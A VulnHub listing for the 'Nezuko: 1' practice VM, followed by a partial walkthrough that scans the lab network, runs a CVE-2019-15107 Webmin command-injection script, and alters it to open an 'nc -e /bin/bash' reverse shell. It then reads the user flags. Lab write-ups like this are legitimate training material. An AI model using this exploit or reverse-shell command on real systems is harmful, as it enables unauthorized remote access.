NEZUKO: 1——202201152003

2023-11-18

NEZUKO: 1——202201152003

About Release

Back to the Top

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

  • nezuko.zip (Size: 2.9 GB)
  • Download: https://drive.google.com/open?id=1fsi4WvQnvYdpHaRMfNufyGiDKckmza_Z
  • Download (Mirror): https://download.vulnhub.com/nezuko/nezuko.zip

Description

Back to the Top

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

Services : Webmin 1.920, Apache, SSH

User : root, zenitsu, nezuko

Hashes : at their home directory

File Information

Back to the Top

  • Filename: nezuko.zip
  • File size: 2.9 GB
  • MD5: 10DBD333208D012E620242276BE2F817
  • SHA1: 7D545A6F86532EC17157104F1952364A6AEDE2A5

Virtual Machine

Back to the Top

  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

Networking

Back to the Top

  • DHCP service: Enabled
  • IP address: Automatically assign

Screenshots

Back to the Top

nezuko 1 screenshot

nezuko 1 screenshot

Walkthrough

Back to the Top

Submit Yours

1.信息收集

Currently scanning: 172.16.91.0/16   |   Screen View: Unique Hosts               
                                                                                  
 9 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 540                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.199   00:0c:29:18:22:fe      1      60  VMware, Inc.                   
 192.168.219.1   f2:18:98:21:29:69      2     120  Unknown vendor                 
 192.168.219.180 00:0c:29:18:22:fe      2     120  VMware, Inc.                   
 192.168.219.254 00:50:56:fb:8b:50      2     120  VMware, Inc.                   
 192.168.219.2   00:50:56:f1:66:62      2     120  VMware, Inc.                   

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo netdiscover -i eth0

image-20230115200742662

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8646  bytes 1926100 (1.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8646  bytes 1926100 (1.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.219.0/24 -T 4                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:06 CST
Nmap scan report for 192.168.219.1 (192.168.219.1)
Host is up (0.0017s latency).
All 1000 scanned ports on 192.168.219.1 (192.168.219.1) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.2 (192.168.219.2)
Host is up (0.0014s latency).
All 1000 scanned ports on 192.168.219.2 (192.168.219.2) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Debian 1 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:8c:6e:2c:b9:f6:97:3c:5b:fc:30:eb:c5:29:0e:38 (ECDSA)
|_  256 ba:37:56:6d:cc:b1:a3:92:3a:09:c9:fb:9f:86:3e:39 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.58 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -p- -A 192.168.219.180                                                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:10 CST
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
13337/tcp open  ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on ubuntu
| Not valid before: 2019-08-20T09:28:46
|_Not valid after:  2024-08-18T09:28:46
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

image-20230115201333944

image-20230115201505149

image-20230115201649135

image-20230115202312994

image-20230115202758930

2.try shellcode

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
	echo '\033[0;31mVULNERABLE!\033[0m'
else
	echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
            
            

image-20230115203445800

                                                                               
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ sh shell1.sh https://192.168.219.180:13337 
test
https://192.168.219.180:13337
Testing for RCE (CVE-2019-15107) on https://192.168.219.180:13337: VULNERABLE!
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

image-20230115203957511

nc -e /bin/bash attack_ip port 作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili

nc -e /bin/bash 192.168.219.177 4444

image-20230115204228848

image-20230115204355244

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 4444             
listening on [any] 4444 ...
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 51698

ls
Authen-SolarisRBAC-0.1
CHANGELOG
acl-lib.pl

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)

                                       
python -c 'import pty;pty.spawn("/bin/bash")' 

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/usr/local/webmin/acl
ls -l
total 736
pwd
/home/nezuko
tail nezuko.txt

from_zenitsu
nezuko.txt

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef

cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...                                                                                                                                                                                                 ....
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                 ... 
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                           .,,,,,,,..                                                                                                                            ....
.  ...................................,,,,,,,,,.,,,,,,,,,,,.......,...                                                                                                                           ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,.                                                                                                                             ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,.                                              .......................                                                        ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  .,........,...,....................................                                                        ....
 ,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  ...........           .........................,...                                                        ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  ...            .                ........,......,...                                                        ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                         ..     ...  ...,,....,..,...  ...                                                   ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                     ..  ....     ..... ..,,.....,...  ...            .                                      ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                   . . ... .. .     ....  .......,...            ...  .                                          
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                             . .   .                 ..  .  ...,*,,,.      ............                                          
 .,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                             ..    */*/(/*,..      .... ..   ..*/((/,. .................                                         
 ..,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                           ..  .,*((((((((((((((/*,. .. ..   ..*/((/.. .................                                         
  .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,                      .  .   .,/(((((((((((((((((((((,... .. ..*/(/*..,(, ..............                                         
  .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                    .      .,*/((((((((((((((((((((((((, . ....,**..,((/, ...............                                        
  .,,,,,,,,,,,,..,,,,,,,,,,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,.,,,,,,..                     .   .*/((((((((((((((((((((((((((((/  ,/,,,./(((((, ...............                                        
   ............................................................((*,..                   .  .  *(((((((((((((((((((((((((((((((///,,,,(((((/..................                                        
   ...............................................................,..               .        ,(((((((((((//(((((((((((((((((((/,.,,,,*(/,  ..................                                        
   ......................................................... .....,..                 .. .  ,/(((((/*,,**/(((((((((((((((((*  ...,..,....................                                        
   ...............................................................,..                       /((///((((((((((((((((((((((((/,/(#/ ....,..,....................                                        
    ...........................................................  .,..                      .((((((((((/****/(((((((((((((((#(/(/ . ..,..,....................                                        
    ...........................................................#/,,..              .    . .,((((((((/**/((/,/(((((((((*,*((((((/ ....,..,....................                                        
    ..............................................................,..              ...    ,/((/**..*///*..*#(((((((((/(((((((#(* ....,..,....................                                        
    ..............................................................,.               .    . ,/((/*/(((/(((#/*(((((((((/*..,**,(#/. ....,..,....................                                        
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..    . /((((,.,///##(((((((((//#(/(((,/.  .,.,,..,....................                                        
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.                     */(((,**(/(#(((((((((#(((/.((#(*  .,,..,..,....................                            ............
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .      .,*((((//(((((###(#(((((((#((/*/((#*.  .,,,,,..,....................                            ............
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              .  .. ,*,*/(((/*,*,/##(((##(##//#(((((###.  ..,,,,,.,,....................                            ............
    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..  .  ,....,*,,,*,,,.,,*(((((((*,,(#*   ..,,,,,.,,....................                          ..............
    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              ....    ....//,*/******,*********,**,*,,,,,,,,*,.,,.,,....................                          ..............
    .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              ....  ... ..,*,,/****(//(((((*/*//*/*,,.,,....................                          ..............
    .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ... . ... ...**,,******,****************,******,**,,,,,....................                            ............
    ..,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .. . ,, ....... ...............,,,,,,,,,,******,*,,,,,,.................... .                          ............
     .,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .... ,*, ....  ............................... ...,,,,,....................                            ............
     .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,.             ...  .,*,,,,,,*,,,,,,..,,,,,,,,.    .  ..........,,,,,,....................                            ............
     .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..    .***,**********,,*****,.        .     . ....,,,,,....................                            ............
      .......................................................,,,,*,..            . .     ,****,*******,,*,.             .       .....,.,,....................                            ............
        ...................................................... /*.,..            ..       *****,*******,**,   ....     ..,.     .  ..,,,,....................                            ............
        .......................................................,..,..          ..         ,*****,*******,*,. ......    ..,,.    ... .,,,,....................                            ............
        ..........................................................,..             .....    .*****,****,,,**.........   ..,,,. ..... .,,,,....................                            ............
        ..........................................................,..          ........     ,*****,****,,(#,.........   ,,,,. ..... .,,,,....................                            ............
         .........................................................,..      ............     .,/********####*.........   .,,,.........,,,,....................                            ............
         ......................................................#/,,..     ..............    ..(#(/**/*####(*,,.......    .,.....,....,,,,....................                            ............
          ........................................................*,.     ..............    ..,#####((####//*..... ..    ... .,,,,.,,,,,,....................                            ............
          ...........................................................     ...............   ...#####(####/*(,....  ..    ...,,,,,,,,,,,,,....................                            ............
          .,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,.     ...............   ...(###(####(//(,....  ...   ...,,,,,,,,,,,,,....................                            ............
           ,.,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................  ..,*(#(###%(*//(...    ...  ...,,,,,,,,,,,,,,....................                            ............
           ..,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................ ...,/*(#####*/((*...   ....  ...,,,,,,,,,,,,,,....................                            ............
           ..,,,,,.,,,,,.,,,,,.,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.     ................ ...,//####%*///(*..   ........,,,,,,,,,,,,,,,,....................                            ............
            .,,,,,,,,,,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ....................//(//#%#*/(//...  .........,,,,,,,,,,,,,,,,....................                            ............
             .,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ...................*/(///((//((/*..  .........,,,,,,,,,,,,,,,,,....................                            ............
             .,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..................,*///******,,,..  ..........,,,,,,,,,,,,,,,,,....................                            ............
              .,,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................ .,,...,,,,,,,,...  ........ .,,,,,,,,,,,,,,,,,....................                            ............
              ..,,,,,,,,.,,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..................,,,,,,,,,,,,,  . ........ ..,,,,,,,,,,,,,,,,,....................                            ............
                ,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..........................      .......... ...,,,,,,,,,,,,,,,.,....................                            ............
                .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     .................,****/*.      .......... ....,,,,,,,,,,,,,,,.,....................                            ............
                 .,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,     ..................***,.        .......... ....,,,,,,,,,,,,,,,.,....................                            ............
                 ........................,,,,,,,,,,,,,,,,,,,,,,,,,,..     ...................           .........  ........,,,,,,,,,,,,.,....................                            ............
                   ............................................,*,,,.        ..............            .........   .........,,,,,,,,,,,.,....................                            ............
                    ...........................................,,.,,.             .......             .. .....    ..........,,,,,,,,,,,.,....................                            ............
                     .............................................,,.                                 .          ..........,,,,,,,,,,,,.,....................                            ............
                      ............................................,,.                     ....,,,..  .           ..........,,,.,.,,,,,,.,....................                            ............
                       ...........................................,,.                       .,(*,.          .........  ,,,,,.,,,,,,.,....................                            ............
                        ...................................... //,,,.     .............    ....*/(//(/        ..........    ,,.,.,,,,,,.,....................                            ............
                        .......................................,,.,*.      .....................,(/.,//      ..........     ...,.,,,,,,.,...................                             ............
                        .,,........................................,.       ...................,**//,        .....      .....,,,,,,.,...................                            .............
                         .,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.       ...................,/((/*                   .....,,,,,,.,...................                            .............
                           ,,,..,,,,,,,,,.,,,,,.,,,.,,,,,,,,,,,,,,,,.         ................ ,/(/(//(,    .......        ......,,,,,,.,...................                            .............
                           ..,..,,,,,,.,..,,,,,.,,,.,,,,,,,,,,,,,,,,.             ..........   ./(/(*,,.    .....................,,,,,,.,..................                              ............
                             ...,,,,,,....,,,,,.,,,.,,,,,,,,,,,,,,,,.                 ....     .,,,,,,,       ................  ..,,,,,.,.   ................                                        
                              ..,,.,,,..,,,,,,,.,,,.,,,,,,,,,,,,,,,,.                           ...,,,        ..............    ...,,,,.,.                                                           
                               .,,.,,,..,,,,,,,.,,,..,,,,,,,,,,,,,,,.                           .,,,.             ...       ......,,,,,.,.                                                           
                                ...,,,,,,,,,,,,.,,,..,,,,,,,,,,,,,,,.               ................                ...........  .,,,,,.,.                                                           
                                  .,.,,,,,,,,,,.,,,,,,.,..,,.,,,,,,,.           ...............                .........    .......,,,,.,.                                                           
                                   ..,,,,,,,,,,.,,,..,.,..,,,,,,,,,,.                                                   ...........,,,,.,.                                                           
                                     .,,,,,,,,,.,,,,,,.,..,,,,,,,,,.,                  ................            ........      ....................................................................
                                      ..,,,,,,,.,,,,,,.,,,,,,,,,,,,.,             .......................                ..,*/(/,....................................................................
                                        .,,,,,,.,,,,,,,,,,,,,,,,,,,.,         .................,,,**/*..              .,*,*((/((/*...................................................................
                                          ...........................               ......  ..*//(##/*. ..  ...........................,.,...........................................................
                                             .......................                      .,*/#(//*(/(/....,,,,.........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.....,,..,,,,,,,,,,,...,,,........
                                                ..  ................      ..................,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...
..........................................................................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..............................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,..,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef



cd from_zenitsu
ls
new_message_15-01-2023_17:05
new_message_15-01-2023_20:05
new_message_15-01-2023_20:10
new_message_15-01-2023_20:15
new_message_15-01-2023_20:20
new_message_15-01-2023_20:25
new_message_15-01-2023_20:30
new_message_15-01-2023_20:35
new_message_15-01-2023_20:40
new_message_15-01-2023_20:45
new_message_21-08-2019_01:13
new_message_21-08-2019_09:11
new_message_21-08-2019_09:12
new_message_21-08-2019_09:13
new_message_21-08-2019_09:40
cat new*
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 



ls
nezuko
zenitsu
cd zenitus
cd zenitsu
ls
to_nezuko
zenitsu.txt
cat zenitsu.txt
Kaminari no kokyū, Ichi no kata...., Hekireki Issen!

                                                                                                                                                                                                                                                                                                                              
                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                               
                       ............,,,,,,,,,,,,****************/***************,,,,,,,,,,,.........                                
                 .............,,,,,,,,*********((((((((((((((((((((((((((((((((((((///********,,,,,,,,.............                        
                 ............,,,,,,,,,*********((((((((((((((((((((((((((((((((((((//*********,,,,,,,,............                         
                 ............,,,,,,,,,**********(((((((((((((((((((((((((((((((//*********,,,,,,,,...........     .                    
                .............,,,,,,,,,*******,****///(((((((((((((((((((((((((((((//(##/**********,,,,,,,,..........    ...                    
                 ..........,,,,,,,,,,,*****,*,*****///((/(((((((((((((((((((((///(/(######***********,,,,,,,,,....................                 
                   ...............,,,,,,,,,,,,*********//####%%##*******,,,,,,,,,,,........................                
                     ..............,,,,,,,,,,,,,,***************///(@%#%(//#####@#******,,,,,,,,,,,,..........................               
                .............,,,,,,,,,,,,**,,,*********/(/(###%###///##########(/*********,,,,,,,,,,,,......................               
                .............,,,,,,,,,,,,,,,,,**********((((((%#%###%(%########//*********,,,,,,,,,,,.......................               
               ...............,,,,,,,,,,,,,,,,**********//(#%%%%##(((#######(###%###(**********,,,,,,,,,,,........................               
               ................,,,,,,,,,,,,,,,**********///#%&&&&&%%(##(##((####(((%####/**********,,,,,,,,,,,........................               
                ...............,,,,,,,,,,,,,,,**********//#&%&&&&&&&&@@%/##((/(####%%#/(###(((*********,,,,,,,,,,,,,........................               
                 ..............,,,,,,,,,,,,,,,**********///%&&&%&&&&&&&&&&&%/##//(###((##(//(#(((**********,,,,,,,,,,,,,,.......................               
                 ...............,,,,,,,,,,,,,,**********/%&%%&%&&&@@&&&&&&&%//#%####(((#((//&@((**********,,,,,,,,,,,,,.........................               
                 ...............,,,,,,,,,,/((/*//#/****/%%%&&&%#(%&&&&&%&&*(##(((%((((#((/**********,,,,,,,,,,,,..........................               
                  ...............,,,,,,,,*%%#(((((**%%%%%%%%%%&%(%&&&&%%#(#((((((%&((//(*********,,,,,,,,,**/*................... ........               
                   ...............,,,,,*&&&&&%%(((((((%%%%%%%%%%%%%%#&%%%%((##((((((*//*********,*/(#%%&&&&&&%%#,...........................               
                   ................,,,*%%%#%&&((((/(/*#%%%(//(###(*#(#(*(((#((*,//******/(%&&&&&&&%%#(*,,,,,..................... ........               
                      .............,,,##*/#%&&%%(((//(((,*,(%%%%%%%#//(%%///(//*,,*/#&&&&&&&%#(*,,,,,,,,,,,,,...................... ........               
                      ..............,,/#(%%&&&&%((/%%*(**,,*/%%%%%%%%//(###(/((&&&&&&%(*,,,,,,,,,,,,,,,,,,,,.......................   .....                
                        .............,(/#/*(%%%#((*%%%%%//,,,,,,,,*,,#,#(,#&&&%&/#%#*,........,,,,,,,,,,,,,,........................... ......                 
                         .............//##%%%%%((/*/%%#(//(//,,,,/%(%%##%%%%//,.......,,,,.....,,,,,,,,,.................. .......... ....                   
                         ..............(#/##(#(//**/(/*/**//,,,(/#%(#%%%*%(#/,......,,,,,,,,,,........,..................... .......... ....                   
                          ..............,#####/(/(//#/*,/(##(%#///*,,..........,,,,,,,,,,,,,.......,.................... ..........  ...                   
                           ..............*##((/,**..(*,//(,..............,,..,,,,,,,,,,,,,,,.......................  ..........  ..                    
                             .............,*...*/%(#/*....................,,,..,,,..,,,,,,,,,,,,,,,,..................   .....                             
                              ...............*/((/........,,,,...,,,,,,..,,,..,,,,,,,,,,,......,,,............                                     
                                ...........,//((*.....,,,,,,...............,,.....,,...........,*(#...........                                     
                                ............///#///...............................,............,.,***#((,.........                                     
                                  ...........,///*///*...........................................,..,****#(((///,......                                    
                                ...............,//*/#(//*,..........,/,*/..........................,...,/,..,#//#,.....                                    
                                ..................*/***..........,***((((,...............................,,,(*,,,//*//.... .                                   
                                     ..............................(/,....................................**,/*,,#,.(..                                    
                                          ........................,**///(/*...................................../....#*/.                                      
                                     ..............................*/*.,,*,........................................,,*/......                                  
                               ........ .........................**(#(,./(.,,,,.................................(,,..,*........                                
                           ..........  ........,.,,,,,,,,,,,,,,/*,**/*//*/*...................................,*,,,,*/..........                               
                      . ..........  ........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............                         
     , .              ........   . .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,,,,,...............                       
     ,. ,..           .....      ..........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,...............                       
     , ...,                    ............,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........,,,,,,,,,,,,...................                       
      *,                     ..................,,.,.,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............,....................                         
                           .........................,....,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...............................                          
                              ............................,..,....,,,.,,,,,.,,,,,,,,.,,..,,,,...,,,,...............................                            
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               

3f2ada6791f96b6a50a9ee43ee6b62df



sshkey
